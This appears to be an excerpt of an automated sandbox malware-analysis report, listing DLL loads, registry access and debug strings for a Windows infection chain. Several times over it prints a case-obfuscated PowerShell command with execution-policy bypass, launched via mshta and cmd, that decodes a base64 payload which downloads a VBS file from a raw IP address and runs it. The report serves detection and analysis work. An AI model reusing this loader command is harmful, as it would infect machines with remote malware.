Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: q:C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.pdb source: powershell.exe, 00000003.00000002.2201944807.0000000004F96000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2464644266.0000000006E50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2465328781.00000000073BA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000008.00000002.2464644266.0000000006E50000.00000004
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2464644266.0000000006E50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2465328781.00000000073BA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2465328781.00000000073BA000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

PowerShell case anomaly found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"	Jump to behavior

Suspicious command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
